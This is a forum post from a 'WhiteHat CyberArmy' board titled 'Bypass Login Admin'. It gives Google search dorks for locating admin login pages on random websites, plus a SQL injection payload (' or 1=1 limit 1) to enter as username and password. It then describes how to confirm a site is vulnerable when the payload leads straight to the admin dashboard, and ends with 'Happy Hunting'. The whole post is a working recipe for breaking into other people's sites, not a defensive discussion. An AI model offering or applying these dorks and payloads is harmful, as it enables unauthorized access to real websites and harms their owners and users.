Home of WhiteHat CyberArmy
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Bypass Login Admin

Go down 
AuthorMessage
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: Bypass Login Admin   Thu Apr 24, 2014 10:57 am

Dork:

Code:
inurl :/ login.php intext: "Welcome, Admin"
inurl :/ panel / intext: "welcone, Admin"
inurl :/ panel / intext: "welcone, Admin" ext: php
inurl :/ manage / ext: php
inurl :/ admin / ext: php
inurl :/ admin2 / ext: php

User and Password
Code:
user: 'or 1 = 1 limit 1 --- +
pass: 'or 1 = 1 limit 1 --- +

Further, this time I would like to find the target website, use top-ranking dork, we check 1 1 website with user and password above, if there is an error like this:

[You must be registered and logged in to see this image.]

it means not vuln Sad
but if straight into the admin dashboard / admin control panel like this:

[You must be registered and logged in to see this image.]

then, the website is vulnerable

Happy Hunting Smile

Credits to: Mr. Xenophobic
Back to top Go down
View user profile http://whitehatcyberarmy.forumotion.com
 
Bypass Login Admin
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical WhiteHat CyberArmy :: WhiteHat CyberArmy Community :: Exploits and Vulnerabilities-
Jump to: